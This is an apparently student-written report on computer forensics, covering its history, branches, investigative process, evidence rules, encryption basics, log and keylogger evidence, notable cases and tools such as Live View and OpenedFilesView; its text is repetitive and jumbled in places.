INTRODUCTION

ABSTRACT

Page | 1

INTRODUCTION

Far more information is retained on a computer than most people realize. It's also more difficult to completely remove information than is generally thought. For these reasons (and many more), computer forensics can often find evidence of, or even completely recover, lost or deleted information, even if it was intentionally deleted The main motto of computer forensic experts is not only to find the criminal but also to find out the evidence and the presentation of the evidence in a manner that leads to legal action of the culprit. Data lost intentionally or accidentally can be recovered with the help of data recovery experts. Computer forensic is one such type where the cause for data loss is identified. There are many definitions of computer forensics however generally, computer forensic refers to the detail investigation of the computers to carry out the required tasks. It performs the investigation of the maintained data of the computer to check out what exactly happened to the computer and who is responsible for it. The investigation process starts from the analysis of the ground situation and moves on further to the insides of the computer’s operating system. Computer forensic is a broader concept which is mainly related to the crimes happening in computer which is against law. Various laws have been imposed to check out the crimes but still they exist and are difficult to find the criminal due to lack of evidence. All these difficulties can be overcome with the help of computer forensics.

Page | 2

INTRODUCTION

HISTORY

Page | 3

INTRODUCTION

HISTORY OF COMPUTER FORENSICS
Prior to the 1980s crimes involving computers were dealt with using existing laws. The first computer crimes were recognized in the 1978 Florida Computer Crimes Act which included legislation against the unauthorized modification or deletion of data on a computer system. Over the next few years the range of computer crimes being committed increased, and laws were passed to deal with issues of copyright, privacy/harassment (e.g., cyber bullying, cyber stalking, and online predators) and child pornography. It was not until the 1980s that federal laws began to incorporate computer crime. Canada was the first country to pass legislation in 1983. This was followed by the US Federal Computer Fraud and Abuse Act in 1986, Australian amendments to their crimes acts in 1989 and the British Computer Abuse Act in 1990. More recently, concern over cyber warfare and cyber terrorism has become an important issue. A February 2010 report by the U.S. Joint Forces Command concluded: "Through cyberspace, enemies will target industry, academia, government, as well as the military in the air, land, maritime, and space domains. In much the same way that airpower transformed the battlefield of World War II, cyberspace has fractured the physical barriers that shield a nation from attacks on its commerce and communication." In response to the growth in computer crime during the 1980s and 1990s law enforcement agencies began to establish specialized investigative groups, usually at the national level. Throughout the 1990s there was high demand for these resources, leading to the creation of regional and even local units. During this period the science of digital forensics grew out of adhoc tools and techniques developed by practitioners. This is in contrast to other forensics disciplines, developed from work by the scientific community. The rapid development of the discipline resulted in a lack of standardization and training. In his 1995 book, "High-Technology Crime: Investigating Cases Involving Computers", K Rosenblatt writes: "Seizing, preserving, and analyzing evidence stored on a computer is the greatest forensic challenge facing law enforcement in the 1990s. Although most forensic tests, such as fingerprinting and DNA testing,

Page | 4

in response to this need. A subsequent 2005 ISO standard (ISO 17025 General requirements for the competence of testing and calibration laboratories) was published and commercial companies began to offer certification and training programs.INTRODUCTION are performed by specially trained experts the task of collecting and analyzing computer evidence is often assigned to patrol officers and detectives" In 2002. the Scientific Working Group on Digital Evidence (SWGDE) published its "Best practices for Computer Forensics”. Page | 5 .

INTRODUCTION INTRODUCTION TO DIGITAL FORENSICS Page | 6 .

Computer forensics The goal of computer forensics is to explain the current state of a digital artifact. digital forensics can be used to attribute evidence to specific suspects. forensic analysis (where evidence is recovered to support or oppose a hypothesis before a criminal court). computer forensics. Page | 7 . Investigations are much broader in scope than other areas of forensic analysis (where the usual aim is to provide answers to a series of simpler questions) often involving complex time-lines or hypothesis. Investigations often take one of three forms. embedded systems (digital devices with rudimentary computing power and onboard memory) and static memory (such as USB pen drives). identify sources (for example. The discipline evolved in a haphazard manner during the 1990s and it was not until the early 2000s that national policies were created. in copyright cases) or authenticate documents. network forensics. As well as identifying direct evidence of a crime. database forensics and mobile device forensics. often in relation to computer crime.INTRODUCTION Digital forensics (sometimes Digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices. Branches: Digital forensics includes several sub-branches relating to the investigation of various types of devices. The discipline usually covers computers. eDiscovery (a form of discovery related to civil litigation) or intrusion investigation (which is a specialist investigation into the nature and extent of an unauthorized network intrusion). storage medium or electronic document. media or artifacts. such as a computer system. The term was originally used as a synonym for computer forensics but has expanded to cover other devices capable of storing digital data. confirm alibis or statements. determine intent. The science of digital forensics is divided into several sub-branches.

Such information was used to track down the kidnappers of Thomas Onofri in 2006. Duncan III to show premeditation and secure the death penalty.INTRODUCTION Computer forensics can deal with a broad range of information. Investigations usually focus on simple data such as call data and communications (SMS/Email) rather than in-depth recovery of deleted data. Sharon Lopatka's killer was identified in 2006 after email messages from him detailing torture and death fantasies were found on her computer. from logs (such as internet history) through to the actual files on the drive. In 2007 prosecutors used a spreadsheet recovered from the computer of Joseph E. proprietary storage mechanisms. usually. SMS data from a mobile device investigation helped to exonerate Patrick Lumumba in the murder of Meredith Kercher. either from inbuilt gps/location tracking or via cell site logs (which track the devices within their range). Network forensics Page | 8 . Mobile devices are also useful for providing location information. It differs from Computer forensics in that a mobile device will have an inbuilt communication system (e. Mobile device forensics Mobile phones in a UK Evidence bag Mobile device forensics is a sub-branch of digital forensics relating to recovery of digital evidence or data from a mobile device. GSM) and.g.

INTRODUCTION Network forensics relates to the monitoring and analysis of computer network (both local network and WAN/internet) traffic for the purposes of information gathering. Database forensics Database forensics is a branch of digital forensics relating to the forensic study of databases and their metadata. By monitoring network traffic from the pairs computers they managed to identify passwords which let them collect evidence directly from computers back in Russia. In 2000 the FBI lured computer hackers Aleksey Ivanov and Gorshkov to the United States for a fake job interview. Page | 9 . Investigations use database contents. log files and in-RAM data in order to build a time-line or recover relevant information. legal evidence or intrusion detection. network data is often volatile and seldom logged making the discipline often reactionary. Traffic is intercepted (usually at the packet level) and either stored for later analysis with specialist tools or filtered in real time for relevant information. Unlike other areas of digital forensics.

INTRODUCTION COMPUTER FORENSICS Page | 10 .

The scope of a forensic analysis can vary from simple information retrieval to reconstructing a series of events. and presentation of computerrelated evidence.g. The computer forensics expert should have a great deal of knowledge of the data recovery software as well as the hardware and should possess the qualification and knowledge required to carry out the task. The main motto of computer forensic experts is not only to find the criminal but also to find out the evidence and the presentation of the evidence in a manner that leads to legal action of the culprit. The goal of computer forensics is to explain the current state of a digital artifact. Computer forensics (sometimes computer forensic science) is a branch of digital forensic science pertaining to legal evidence found in computers and digital storage media. such as a computer system.INTRODUCTION Computer forensics is the collection. storage medium (e.g. Also there are standards that need be followed to acquire the evidence. Computer evidence can be useful in criminal cases. Page | 11 . analysis. an electronic document (e. hard disk or CD-ROM). The major reasons for criminal activity in computers are: Unauthorized use of computers mainly stealing a username and password Accessing the victims computer via the internet Releasing a malicious computer program that is virus Harassment and stalking in cyberspace E-mail Fraud Theft of company documents. and human resources/employment proceedings. Hence there are introduction of new laws to deal with the computer crime and related issues. an email message or JPEG image). civil disputes. Basics of Computer Forensics: Computer forensics is the art of finding the evidence which is valid in legal terms. Computer crime is increasing at an alarming rate and the procedures that are required for curbing the crime are not sufficient to have a counter effect. preservation. Computer forensic facilitates the organized and careful detection of computer related crime and abuse cases.

It is the crime scene investigation over which further investigation is based.INTRODUCTION The basics things that are required for a computer forensics professional includes the proper understanding of the computer hardware and software. Computer forensics experts must identify the suspects and the sources from where the evidence can be collected. So that any further investigation of the media does not lead to damage of the original one. The next thing is the analysis of the evidence. A proper investigation for the traps should be carried out so that any unintentional action does not cause the deletion of data or information that could have been proved vital in further proceedings. understanding of the ethics and legalities. Examination of the surroundings of the machine and documentation of the same should be done. When the machine is acquired. Hence it should be powered down carefully. Also they are required to preserve the digital evidence and extract sufficient information from it that can be produced before the court of law. A thorough analysis of the evidence is needed before the case can be presented before the court. The findings should be then documented properly and the all the information in the form of evidence should be presented before the authority in concern. it is moved out of the crime scene to a secluded place where the evidence cannot be tampered with. The first thing the computer forensics professional must do when a case is handed over to him or his team is detailed case study. It is advisable for the computer forensics professional to carry out the investigation from the visible and easily observable data and then proceed further Page | 12 . There may reside a large quantity of email or data in the computer that need be scanned. The next thing is to record the open applications. The best thing in any type of investigation process is to completely copy the storage media device. It is desirable that the documentation be carried out in the presence of a senior official. a thorough knowledge of computer operating system as well as the file system. When the machine is acquired then following tasks need be performed. The detailed things that need to be performed include acquisition of the electronic evidence as well as the securing the data and relevant information including the machine. Crime Scene Investigation is also an important task which should have the priority. The next thing that needs the concern is to document the hardware involved. Scanning of the emails also is an important task.

The subject of the computer forensics also requires the knowledge of the data recovery processes.INTRODUCTION in the depth of operating system files. The data security may be required over the individual single systems as well as the systems that are connected over the network. Although many steps Page | 13 . It is also the duty of the system administrator to support and maintain the software tools so that can intrusion can be detected at the earliest. The evidence in computer forensics may take many forms. hence there exist little standardization and consistency across the courts of law and industries. In both the cases the services of the computer forensics expert can be availed. Since the computer forensics is a new subject discipline. The legislation in various countries has a good support to the services of computer forensics. The data security can be widely classified to have to aspects one in the data corruption or data damage as well as in case of any damage or theft of the information due to human interaction. The term forensics has its meaning in the primary dealing of the recovery and analysis of the possible evidence. Also the important thing is the legality of the process. The computer forensics experts are required to have a great deal of knowledge regarding the system administration as well. Computer forensics can be applied even in lieu for the purpose of data security. The difference is that the files over the storage media like the hard disk drives. floppy disks. tape drives and the optical disks should be recovered and proper evidence should be made from that information. Data Security The computer forensics and the security of the data have a relation. or it may be like the DNA evidence that is recovered from blood stains or samples. An analogy that can be drawn in contrast is like the fingerprints that may have been left over a window or some thing else that can be recorded as the evidence. The Information Systems or the Network Systems are easily prone to damage if the appropriate measures are not taken at the beginning. The data security is important in any corporate organization. The same is the case in the computer forensics. Any piece of important information should not be neglected. The evidence in case of the computer crimes is the data or the information that can be effectively used in the legal prosecution that may lead to the punishment of the culprit.

In some cases it is also possible that there are disasters and natural calamities like the earth quakes. The task of the computer forensic expert becomes severe in the tracks are erased. Page | 14 . Incident response systems and internal investigations can be done using the computer forensics. Incident Response Systems also play a part of computer forensics. Computer forensics services also include investigative assistance. In such cases the computer forensics expert is required to run the data recovery process to recover the data. But sometimes it is referred to as a part of computer forensic. Most of computer forensics services provide useful services to an organization. hurricanes etc. It is very much useful in professional environment where the requirement is quite high. Another aspect of computer forensics is the electronic document discovery. The data security is important in case where the information is considered as sensitive or secret to the functioning of the organization. The computer forensics services are availed most in the cases of sabotage and manhandling of the data or information. volcanoes. Some of important fields where in the services of computer forensics can be applied include the following. If there is the theft of the storage device itself then the task is much tedious. Computer Forensic Service There are many different areas of computers where in the services of computer forensics is employed. In some cases it is possible that the storage media is damaged physically or the data storage device is moved. Computer forensic can be used for its services to support criminal and civil warrants. Computer forensics is extensively used in criminal as well as civil litigations. The computer forensics is also important in corporate consulting. Data recovery in itself is a large topic. Forensic data recovery – FDR is also a part of computer forensics.INTRODUCTION have been taken and the government is providing the support required by forming new laws and legislations. Security risk management can also be carried out using the computer forensic tools. The services provided by the computer forensics are the development of the plans to gather the electronic evidence. The secrecy or the privacy of organization is important in some cases where it is maintained as per expectations. The services of computer forensics are availed in private as well as government organizations. fire. There are many laws that provide the support to a computer forensic.

laptops. Even computer forensics investigation is beneficent for the purpose of identification. The compliance of proactive reviews as well as risk assessment and even for the investigation of specific allegations the services of computer forensics can be availed. analysis and reporting of digital evidence. the computer forensics can be even applied for individual case studies involving personal issues. Also the protection of intellectual property is a major service. The consultation of computer forensic can be provided to adhere to the legislation involving federal and provincial privacy. Even the services of computer forensics can be used for data recovery problems. The services are also available for dispute resolution and to provide an expert witness testimony. In case of corporate consultations the services provided by the computer forensics professional include the development of in house standards.INTRODUCTION Also the computer forensics is useful in electronic discovery requests. These audits may involve remote or even network analysis. The electronic file retention policies are also a part of consultancy services of computer forensics. In the event of conducting the audits also its services can be availed. The digital evidence may be from desktop computers. acquisition. Intentional misuse of privacy or personal information can be considered as a legal case with the help of computer forensics Page | 15 . The protection of corporate assets is also a service of computer forensics. preservation. Apart from all these services. storage servers. or any type of removable storage devices.

INTRODUCTION COMPUTER FORENSICS PROCESS Page | 16 .

acquisition. acquisition or imaging of exhibits. analysis and reporting. usually in the form of a written report. forensics researcher Brian Carrie described a more "intuitive procedure" in which obvious evidence is first identified after which "exhaustive searches are conducted to start filling in the holes" Once evidence is recovered the information is analyzed to reconstruct events or actions and to reach conclusions. On the field experience is always different than the theoretical procedures. Anyhow more of less the procedures that are required or that can be followed depends upon the situation that is encountered. When an investigation is complete the investigator presents his data. Evidence tracking can be based on examining and observing the physical locations as well as based on thorough examination of data or information. The first stage. in lay person’s terms. often using a write blocking device to prevent modification. In 2002 the International Journal of Digital Evidence referred to this stage as "an in-depth systematic search of evidence related to the suspected crime". In 2006. Evidence Tracking The main function of any computer forensics professional is to track the evidence that can be legally produced before a court of law. The evidence tracking mechanisms usually start with the observations of the physical locations of the crime scene investigation. involves creating an exact sector level duplicate (or "forensic duplicate") of the media. The physical location in discussion is the address where the Page | 17 . Where the computer system is located and the how the computer system can be accessed.INTRODUCTION A digital forensic investigation commonly consists of 3 stages. Both acquired image and original media are hashed (using SHA-1 or MD5) and During the analysis phase an investigator usually recovers evidence material using a number of different methodologies (and tools). work that can often be performed by less specialist staff.

Efforts should be made to analyze and collect the evidence from the undeleted files. and all other peripherals that may have some link with the computer should be analyzed. Even the sources that are external should also be examined in great detail. For time sake it is needed for the forensics expert to commit the crime. and the cookies.INTRODUCTION crime has been committed. There exist many files that are used by the operating system that can provide vital evidence for the forensics expert. The server if any present in the network and relation with the victim computer system should be studied and analyzed. Those places where the evidence can be easily collected should also be examined. The first step is to carefully observe and examine the location nearby the computer system. The cache can also prove as important evidence. The components like the fax machines. The networks connections and the number of systems that are connected to them also matters in the investigations. Next in line are the temp files (temporary). Some of places that need the attention of the computer forensics team include the following. mouse etc or any other peripherals can be subjected to DNA finger printing. Also physical location may also be used in discussion where it relates to physical memory location. The major evidence can be collected from the log files that are generated each time an event occurs due to the action from the user. The first among them is the computer system itself. Usually some sorts of tool kits are used for the purpose of analysis of evidence. These files may sometime store encrypted information that should be decrypted. It is required for the computer forensics expert to visualize himself in the footsteps of a criminal who might have committed the crime. modems. The next in the line is the phone set. If such files are deleted then the deleted data recovery process should be initiated for the recovery of such files. Some of the examples of the files that can be effectively used as evidence include the following. Also the importance of the slack space files and the swap files is not ruled out. Digital evidence Page | 18 . The information like whether it is a single system or a networked PC should also matters. The keyboard. Next the main part of the analysis starts with the study of the internals of the computer system mainly the software like the operating system and the log files associated with them. More over the hard disk drive as the secondary memory device and the operating system files are studied in detail.

is important to establish the authenticity of evidence.” Page | 19 . for example. ultimately. in the case US v. In the United States the Federal Rules of Evidence are used to evaluate the admissibility of digital evidence. US judges are beginning to reject this theory. Attorneys have argued that because digital evidence can theoretically be altered it undermines the reliability of the evidence. the United Kingdom PACE and Civil Evidence acts have similar guidelines and many other countries have their own laws. digital evidence falls under the same legal guidelines as other forms of evidence. Federal Rules of Evidence state that a qualified expert may testify “in the form of an opinion or otherwise” so long as: “(1) The testimony is based upon sufficient facts or data. courts do not usually require more stringent guidelines. through analysis and. to the court. In the US. and (3) the witness has applied the principles and methods reliably to the facts of the case.INTRODUCTION Digital evidence can come in a number of forms Digital evidence Where it will be used in a court of law. Digital investigators. The ease with which digital media can be modified means that documenting the chain of custody from the crime scene. Bonallo the court ruled that "the fact that it is possible to alter data contained in a computer is plainly insufficient to establish untrustworthiness". particularly in criminal investigations. (2) the testimony is the product of reliable principles and methods. have to ensure that conclusions are based upon factual evidence and their own expert knowledge.

Or. in the UK forensic examination of computers in criminal matters is subject to ACPO guidelines. The data analysis software is even capable to perform extractions of the data. Specific calculations can also be performed. mobile phones are often acquired inside a Faraday shield to stop radio traffic to the device. Statistical Analysis of data can also be carried out. The analysis should be done in order to identify the information over the systems that have some potential information. The accuracy of the organizations data need to be studied. The first step in data analysis is called as scoping where in the auditor can determine the objectives and is capable of identifying the organizational systems. For example. The Page | 20 . Data analysis is a process which contains many steps in order to carry out a proper investigation. The functions that can be carried out by an auditor using the data analysis software include the following: The data analysis software is used for passing the queries of the data. The steps in data analysis are discussed below. There are even that can be used to carry out the steps in data analysis for example the Computer Assisted Auditing Tools and Techniques – CAATT.INTRODUCTION Many of the sub-branches of digital forensics have their own specific guidelines for handling and investigating evidence. A professional in computer forensic is required to audit the data to get required evidence. A portable Tableau write-blocker attached to a Hard Drive Data Analysis Analysis of computer data is also an important part in computer forensics. The next important function that can be carried out is the stratification of data. The missing sequences in the data segment can be identified with the help of data analysis software. There is even a data analysis software helps and minimizes the time to carry out the task.

The reporting of this data is carried out in the next step. Even in extreme cases when a file is found and opened by any person then also person should not be able to read to the file. Extracting the key information from the given data that forms the valid evidence is an important task that needs to be carried out. Page | 21 . It includes for example the valuation of credit and debit.INTRODUCTION next step is to request the information from the concerned organization. The reporting can be carried to have discussions with the team members or even higher ups. The file should be decrypted before it can be read. as well as reliable. The next step comprises the procedures to extract the data. It is step to find out whether the information provided by the organization is valid. Is the information provided has any false information regarding the behavior and dealing of organization. The extracted information should be providing relevant evidence. The encrypted file is stored in some location that is not easily identifiable. In short only the information that provides sufficient and relevant part need be considered. work papers as well as the presentations. Next step involves data importation where in the computer forensics professional is required to determine the authenticity of the data and verify the credentials of the information by appropriate investigations. The next in the data analysis procedures include data profiling. Data Encryption The encryption of any information in a computer system is done to maintain the privacy or secrecy of the subject. When all the above steps are carried in complete satisfaction and the information is collected so far. The contents of the file or data after encryption are not in a readable format. all else is just ignored. Documentation can be carried in the research sheets. The information regarding the decryption is available only to the person who is authorized for reading the information. But it is also desired for the person who is encrypting the file to again decrypt it. histograms and modeling. The outcome results of the audits must be reported. One of the noticeable things in data analysis is continuous monitoring of information. An overall conclusions of the data that has been collected so far needs to carried out. The information that is requested from the organization should be sufficient. Other techniques that are worth mentioning include comparative analysis or data. relevant. This is done so that there is no leakage of the file.

The sender uses this key for providing the encryption. Below mentioned are some of the classical ciphers used in cryptography. The private key ciphers are again classified as stream and block ciphers. There are many ciphers that are used for encryption of the information. These machines were complex than the earlier encryption techniques. The encryption methods can be divided into symmetric key algorithms and asymmetric key algorithms. Grille cipher. These are the algorithms that are employed for the encryption of information.ROT13. In case of transposition ciphers the examples are Scytale. Affine cipher and at bash cipher. They are classified depending on fixed size . They are Auto key cipher. The public key is shared. as well as VIC cipher.block ciphers or in a continuous stream of symbols . The Symmetric key ciphers there are two different types of encryptions used. for example RSA there are usually two separate keys public and private. In the case of asymmetric key algorithm. Rotor Machines and finally as Modern Ciphers. The computer forensics experts are required Page | 22 . In both the cases the sender and receiver are required to have a shared key. The example in case of substitution ciphers includes the following Caesar cipher . The Modern ciphers are classified as Public key and Private Key. Play air cipher by Charles Wheatstone. The shared key should be known to both of them in advance. And then the receiver uses the same key for the purpose of decryption and reading of the information that is passed over. The classical ciphers are again classified as Substitution ciphers and Transposition ciphers. encryption of the text was done using some more sophisticated machines called as rotor machines. Permutation cipher. In the earlier part of the 20th century.INTRODUCTION A cipher is the algorithm that is used to encrypt the file. Polyalphabetic substitution . Computer forensics can be applied even in lieu for the purpose of data security. whereas the private key is not shared with others except the two parties.Hill cipher and Viennese cipher. There are even attacks that are carried out over the classical ciphers like for example the Frequency analysis and Index of coincidence.stream ciphers. The ciphers can be classified as Classical ciphers. Data Security The computer forensics and the security of the data have a relation. The examples of symmetric key algorithm include DES – Data Encryption Standard as well as the AES – Advanced Encryption Standard. It is required for both the parties in communication to keep the information secret from the parties that are involved in the communication.

fire. The difference is that the files over the storage media like the hard disk drives. Since the computer forensics is a new subject discipline. If there is the theft of the storage device itself then the task is much tedious. The same is the case in the computer forensics. In some cases it is possible that the storage media is damaged physically or the data storage device is moved. volcanoes.INTRODUCTION to have a great deal of knowledge regarding the system administration as well. In some cases it is also possible that there are disasters and natural calamities like the earth quakes. Also the important thing is the legality of the process. The Information Systems or the Network Systems are easily prone to damage if the appropriate measures are not taken at the beginning. In both the cases the services of the computer forensics expert can be availed. floppy disks. In such cases the computer forensics expert is required to Page | 23 . The legislation in various countries has a good support to the services of computer forensics. tape drives and the optical disks should be recovered and proper evidence should be made from that information. The data security is important in case where the information is considered as sensitive or secret to the functioning of the organization. The data security may be required over the individual single systems as well as the systems that are connected over the network. hence there exist little standardization and consistency across the courts of law and industries. The subject of the computer forensics also requires the knowledge of the data recovery processes. It is also the duty of the system administrator to support and maintain the software tools so that can intrusion can be detected at the earliest. or it may be like the DNA evidence that is recovered from blood stains or samples. The evidence in case of the computer crimes is the data or the information that can be effectively used in the legal prosecution that may lead to the punishment of the culprit. Although many steps have been taken and the government is providing the support required by forming new laws and legislations. The term forensics has its meaning in the primary dealing of the recovery and analysis of the possible evidence. The data security can be widely classified to have to aspects one in the data corruption or data damage as well as in case of any damage or theft of the information due to human interaction. hurricanes etc. The data security is important in any corporate organization. An analogy that can be drawn in contrast is like the fingerprints that may have been left over a window or something else that can be recorded as the evidence. The evidence in computer forensics may take many forms.

The CSI tools are also available and the expert should be proficient in the usage of these tools. Some of qualities that are required from a crime scene investigation professional are mentioned below.INTRODUCTION run the data recovery process to recover the data. The crime scene investigation professional is required part of the computer forensics team. Page | 24 . crime scene technicians etc. The investigative professional is usually an officer appointed by the authority. The basis of further investigation is dependent over the crime scene investigations. The computer forensics has a part known as crime scene investigation. An important difference that should be noted here is that the evidence to prove that the person who have accessed the system have committed the crime is difficult to prove in the court of law. The usage of incident response systems is quite useful. The software tools can be used to track the changes that are made during the crime. It is expected that the person is well versed with the photographic equipments and the processes that needs to carried out during the process. The finger prints over the equipments like the victim computer etc can be mapped to find the person who might have accessed the system. The computer forensics services are availed most in the cases of sabotage and manhandling of the data or information. And to analyze the possibilities of the clues he might have left behind. The crime scene investigation in case of computer crime is similar to the crime scene investigation carried out in the other cases like murder. Detail reports can then be drawn based on the finding of the preliminary investigation. There different positions and categories in the computer crime scene investigation like crime scene analysts. Crime Scene Investigation The fist and the most important part of any forensic investigation is the crime scene investigation CSI. The task of the computer forensic expert becomes severe in the tracks are erased. He should be capable of preparing the diagrams and the collecting evidence with greatest observations. Hence it is required to have a criminal mindset and the things that can lead to the vulnerability of the organization that is the victim of the crime. The first thing that should be borne in mind before starting the investigation is to behave with the mindset of how the criminal would have committed the crime. robbery etc. The investigative results should be such that the crime scene should be recreated.

The log files are important not only in investigation but more important in proving the point in the court of law. Page | 25 . Or corrupt the log files. Hence the log files play an important role in determining the fate of the computer criminal. The key logger programs can be used to trace the habits of the criminal. A thorough study of the key words that are entered makes way for the computer forensics experts to nail the criminal. Log files contain the date and the time stamps to show the record of the user’s activities. The capacity of the professional to check the evidence and produce it legally in the court of law matters a lot.INTRODUCTION The access to the computer system and the networking areas also need to be looked thoroughly. If the computer criminal is intelligent one not to live any evidence then it is also possible that he may delete the log files. The tendency of the key logger program to record each and every key word including the usernames and the passwords or any other key gives some specific information about the criminal and the time stamp of when the crime might have been committed. Crime scene investigation is based on the principle of first hand information and the observation power of the professional. To find the relative information after investigating the personnel and witnesses is also a part of computer crime scene investigation computer forensics. If in case the log files are lost then the data recovery process to recover the log files should be initiated. For example the database application software requires a mandatory login with a password prompt. Most of the computer forensics is dependent on the log files. Log files are those files that are created by the user’s operating system whenever a task is performed. Log files are not only created by the operating system but some other application software as well. From the starting of the operating system and loading the personnel settings of the user there exists a Big Brother kernel that is responsible for monitoring the user activities. Whatever may be the truth but the evidence matters a lot in the court of law. The task involved in studying the key logger program is tedious since the junk information also needs to be scanned a lot. Log files are the system files that provide the information about the activities of the user. Let us try to discuss the importance of the log files. Log File Recovery For a computer forensic professional recovery of the log files is an important task.

The hard ware key logger’s example is ‘Key Ghost’ key logger.INTRODUCTION The database applications are so designed to record in a simple text file the activities of the user. Towards the end of this period. Page | 26 . It is also possible that the log files may be in some cases in the encrypted format. The key logger program’s trick is to store each of the key strokes of the key board into a text file. The computer forensics professional should be well versed with all the techniques and the different types of the log files. BTK Killer Dennis Rader was convicted of a string of serial killings that occurred over a period of sixteen years. Rader sent letters to the police on a floppy disk. This helps in tracking the changes that are made to the database. Hence utmost care must be taken to preserve the log files with our tampering the data in it. It is connected in between the keyboard and the computer. The log files play an important in the tracking the culprit of computer crime. If the computer administrator is clever enough to employ a key logger program then the task of computer forensics professional becomes much simpler. The computer forensics professional uses this key logger text file and scans the contents to read the information and the actions carried out by the user. It is required for him to decrypt the encrypted log files. Examples: Computer forensics has played a pivotal role in many cases. If they are lost and could not be recovered then the task of a computer forensics expert is very much difficult. Metadata within the documents implicated an author named "Dennis" at "Christ Lutheran Church". But a disadvantage regarding the key logger program is that the forensics professional is left with the task of studying most of the irrelevant information since all the key strokes are recorded. this evidence helped lead to Rader's arrest. It is a small device that can store some 5 mega bytes of data in the text format. There are even hard ware key loggers that can be used to record the information. Most of the log files are usually stored in the text format.

INTRODUCTION Joseph E. Robert Glass.] COMPUTER FORENSICS TOOLS Page | 27 . Sharon Lopatka Hundreds of emails on Lopatka's computer lead investigators to her killer. Duncan III A spreadsheet recovered from Duncan's computer contained evidence which showed him planning his crimes. Prosecutors used this to show premeditation and secure the death penalty.

For many police departments. Here are a few computer forensics programs and devices that make computer investigations possible: Disk imaging software records the structure and contents of a hard drive.INTRODUCTION Tools: No matter how limited a department's budget is. it's possible to not only copy the information in a drive. Programmers have created many computer forensics applications. Page | 28 . no credible investigator would stoop to wrenching open a computer to find clues. With such software. the choice of tools depends on department budgets and available expertise. but also preserve the way files are organized and their relationship to one another.

a good defense lawyer could suggest that any evidence gathered in the computer investigation isn't reliable. it's very difficult and time consuming to search computer files manually. Of course. Because modern computers can hold gigabytes of information. this information could be lost easily. For example. The tools analyze data and assign it a unique number. Investigators use files recovery programs to search for and restore deleted data. the data in RAM ceases to exist once someone shuts off the computer. If the hash numbers on an original and a copy match. which can help tell investigators about the suspect's Internet activities. the copy is a perfect replica of the original. There are several programs designed to preserve the information in a computer's random access memory (RAM). Both the software and hardware tools avoid changing any information. Phoning It In Cell phones can contain important information on them. Hashing tools compare original hard disks to copies.INTRODUCTION Software or hardware write tools copy and reconstruct hard drives bit by bit. These devices retrieve everything from text messages to ring tones. Page | 29 . Without the right software. a few anti-forensics experts argue that no computer evidence is completely reliable. Encryption decoding software and password cracking software are useful for accessing protected data. Some tools require investigators to remove hard drives from the suspect's computer first before making a copy. Analysis software sifts through all the information on a hard drive. A cell phone is essentially a small computer. Other programs let investigators search for specific content that may be on the suspect's computer system. looking for specific content. Otherwise. Sometimes this results in an incomplete file. Unlike information on a hard drive. A few computer forensics vendors offer devices that can copy all the contents in a cell phone's memory and print up a comprehensive report. These tools are only useful as long as investigators follow the right procedures. These programs locate data that the computer has marked for deletion but has not yet overwritten. some analysis programs search and evaluate Internet cookies. which can be more difficult to analyze.

just yank out the network cable to avoid the possibility of intellectual property from being stolen from the system. Live View creates a virtual disk out of the system that allows you to then safely investigate a copy of the system without interfering with anything installed. courts may have a hard time justifying the inclusion of computer evidence in a trial or investigation. This as an additional tool and rule out obvious malware or other items that tie themselves into the registry. it's worthwhile to enable a firewall to block the traffic or better yet. there is OpenFilesView.x. Live View. which lists open files but for Windows. While that's running. If there is. Techniques: One of the first things that you'd need to do is take the compromised system out of the picture. Once this has been completed. you could use VMware Converter to create a vmdk (virtual machine disk) to use in more recent versions of Server or Workstation. The next trick is to determine what additional files. And if it doesn't detect Workstation 5.INTRODUCTION Whether courts continue to accept computer evidence as reliable remains to be seen. there is no similar command. it will download it for you. Of course.5 or VMware Server 1. If that's the case. by default. In Linux we use lsof. an open source utility. you can look into determining what has been changed. This allows us to determine if anything suspicious exists in the system while it's running live. Page | 30 . you can use Hijack. Antiforensics experts argue that it's only a matter of time before someone proves in a court of law that manipulating computer data without being detected is both possible and plausible. Once you've rebooted the system you can then go to Merijn and download Startup List. This is a great way to start the investigation of a system and determine what things might have potentially been put on the system to restart each time the system does. Instead. a Windows executable that lists all the files and processes – both local and network based – on the system. On another basis. creates a virtual machine out of the existing system. other than the usual. are open. Wire shark can let you review all network traffic to see if anything unexpected is being sent out to another location.

Because all changes made to the disk are written to a separate file. Live View automates a wide array of technical tasks. 98 Linux (limited support) Behind the scenes. all without modifying the underlying image or disk. can be used to examine the disk safely to see what has been finally changed. we can then rebuild the system with appropriate additional security in place to prevent the attack from happen. The end result is that one need not create extra "throw away" copies of the disk or image to create the virtual machine. Me. an important factor to consider in this day and age of economic belt-tightening. the examiner can instantly revert all of his or her changes back to the original pristine state of the disk. Forensics of a system is critical to know what has been compromised. NT. And we can do this all at minimal cost. a newly updated version of the live Linux forensics tool. Live View is capable of booting Full disk raw images Bootable partition raw images Physical Disks (attached via a USB or Firewire bridge) Specialized and closed image formats (using 3rd party image mounting software) Containing the following operating systems Windows 2008. 2003. This allows the forensic examiner to "boot up" the image or disk and gain an interactive. If we don't look into what happened we may miss out on critical data being compromised or learn how the system was first broken into. user-level perspective of the environment.INTRODUCTION Helix 3. Once this investigation is done. Live view: Live View is a Java-based graphical forensics tool that creates a VMware virtual machine out of a raw (dd-style) disk image or physical disk. 2000. Vista. Some of these include: resolving hardware conflicts resulting from booting on hardware other than that on which the OS Page | 31 . It is one thing to know if we've been attacked but it's another to find out what those attackers have done to the system. XP.

additional information is displayed: handle value. Closing the right process will solve this problem. or close the process that opened these files. read/write/delete access. OpenedFilesView will show you which process lock your file. This utility is especially useful if you try to delete/move/open a file and you get one of the following error messages: Cannot delete [filename]: There has been a sharing violation. file position. and correctly specifying a virtual disk to match the original image or physical disk.. you can also release the file by closing the handle from OpenedFilesView utility. and more. When you get one of these error messages. The source or destination file may be in use. you can also close one or more opened files. be aware that after closing a file in this way.INTRODUCTION was originally installed. optionally. Close any programs that might be using the file and try again. For each opened file. and even crash.. Live View is developed by CERT. the program that opened the file may become unstable. However. Optionally. the process that opened the file. Cannot delete [filename]: It is being used by another person or program. Software Engineering Institute OpenedFilesView: OpenedFilesView displays the list of all opened files on your system. Page | 32 . creating a customized MBR for partition-only images.

